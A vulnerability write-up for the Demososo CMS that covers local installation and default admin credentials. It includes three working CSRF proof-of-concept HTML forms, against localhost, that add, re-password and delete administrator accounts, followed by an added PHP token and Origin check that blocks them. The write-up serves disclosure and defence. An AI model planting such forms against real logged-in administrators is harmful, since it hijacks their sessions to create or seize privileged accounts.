Demososo-CSRF

This CMS can be downloaded from here.

1. Install

First, create a database; you can choose any name. Here I create a database named dm.

create database dm;

Second, import the data into the database you just created. You can import it with phpMyAdmin or the mysql command line. I use the mysql command to import the data.

mysql -uroot -ppassword dm < import.sql

PS: import.sql is in dmqyjz_v20190822/.

Then visit http://localhost/dmqyjz_v20190822/install.php.

Enter your Domain Name, Database Name, MySQL Username, MySQL Password.

And if your MySQL version is higher than 5.5 choose , or choose .

Click 开始配置 to install.

If you see this page, the CMS has been installed successfully.

2. Log in as Super Administrator

Visit http://localhost/dmqyjz_v20190822/admindm-yourname/g.php

Log in as admin:admin123.

3. Description

After logging in as super administrator, open the following three PoC pages.

CSRF-1

This CSRF PoC adds a normal administrator named test7 if a logged-in super administrator clicks the button.

<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<!-- charset added so the Chinese button label below is submitted as the UTF-8 bytes the CMS expects;
     Burp emitted it as Latin-1 numeric entities, which browsers do not re-encode correctly -->
<head><meta charset="utf-8"></head>
<body>
<form action="http://localhost/dmqyjz_v20190822/admindm-yourname/mod_account/mod_user.php?lang=cn&amp;file=add&amp;act=insert" method="POST">
<input type="hidden" name="name" value="test7" />
<!-- "提交" is the label of the CMS's own Submit button -->
<input type="hidden" name="Submit" value="提交" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

CSRF-2

This CSRF PoC changes a normal administrator's password and permissions if a logged-in super administrator clicks the button.

<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<!-- charset added for the same reason as in CSRF-1: the button label must reach the server as UTF-8 -->
<head><meta charset="utf-8"></head>
<body>
<!-- tid=107 is the id of the administrator account being edited (test7 in this write-up) -->
<form action="http://localhost/dmqyjz_v20190822/admindm-yourname/mod_account/mod_user.php?lang=cn&amp;file=edit&amp;act=update&amp;tid=107" method="POST">
<input type="hidden" name="email" value="test7" />
<input type="hidden" name="password" value="123" />
<!-- userprevi[] carries the category ids the account is granted access to -->
<input type="hidden" name="userprevi[]" value="cate20150805_1125344029" />
<input type="hidden" name="userprevi[]" value="cate20150805_1133251007" />
<input type="hidden" name="userprevi[]" value="cate20160410_0658287350" />
<input type="hidden" name="userprevi[]" value="cate20190417_1811131418" />
<input type="hidden" name="userprevi[]" value="cate20190423_1717461277" />
<input type="hidden" name="userprevi[]" value="cate20190425_1847297732" />
<input type="hidden" name="user_stanoaccess" value="n" />
<!-- "修改" is the label of the CMS's own Modify button -->
<input type="hidden" name="Submit" value="修改" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

CSRF-3

This CSRF PoC deletes a normal administrator if a logged-in super administrator clicks the button.

<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<!-- no method attribute, so this form submits as GET: the deluser action is reachable from a plain link -->
<form action="http://localhost/dmqyjz_v20190822/admindm-yourname/mod_account/mod_user.php">
<input type="hidden" name="lang" value="cn" />
<input type="hidden" name="act" value="deluser" />
<input type="hidden" name="tid" value="107" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

4. Analysis

CSRF-1

Add normal administrator

Code

CSRF-2

Edit normal administrator’s password

Code

CSRF-3

Delete normal administrator

Code

None of the three handlers (insert, update, deluser) checks a CSRF token or the Referer header, so any page the super administrator visits while logged in can trigger them.
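As an added example (not part of the original post and not Demososo's own code), the check the analysis says is missing, written as a PHP fragment that could wrap the insert/update/deluser branches of mod_user.php; the function names, the csrf_token field name and the placement are assumptions:

```php
<?php
// Added example, not Demososo code: a per-session CSRF token plus an
// Origin/Referer check for the state-changing actions of mod_user.php.
// Assumes the admin session is the one the CMS already uses for login.
declare(strict_types=1);

session_start();

// Issue one random token per session; embed it in every admin form.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Reject the request unless the posted token matches the session token
// (constant-time compare) and, when a browser sent Origin/Referer,
// that header names this server.
function csrf_verify(): void
{
    $expected = $_SESSION['csrf_token'] ?? '';
    $given    = $_POST['csrf_token'] ?? '';
    if ($expected === '' || !is_string($given) || !hash_equals($expected, $given)) {
        http_response_code(403);
        exit('CSRF token missing or invalid');
    }
    $source = $_SERVER['HTTP_ORIGIN'] ?? $_SERVER['HTTP_REFERER'] ?? '';
    if ($source !== '' && parse_url($source, PHP_URL_HOST) !== $_SERVER['SERVER_NAME']) {
        http_response_code(403);
        exit('Cross-origin request rejected');
    }
}

// The three actions abused by the PoCs must be POST and must carry the token.
// Requiring POST also closes the GET path used by CSRF-3 (act=deluser via a link).
$act = $_GET['act'] ?? $_POST['act'] ?? '';
if (in_array($act, ['insert', 'update', 'deluser'], true)) {
    if ($_SERVER['REQUEST_METHOD'] !== 'POST') {
        http_response_code(405);
        exit('This action requires POST');
    }
    csrf_verify();
}
// ... the CMS's existing insert/update/deluser logic follows here ...
?>
<!-- hidden field to add to each admin form (add, edit, delete): -->
<input type="hidden" name="csrf_token" value="<?= htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') ?>" />
```

With this in place, each of the three PoC forms is refused with 403 because the attacker's page cannot read the victim's session token, and CSRF-3 is additionally refused with 405 because it submits via GET.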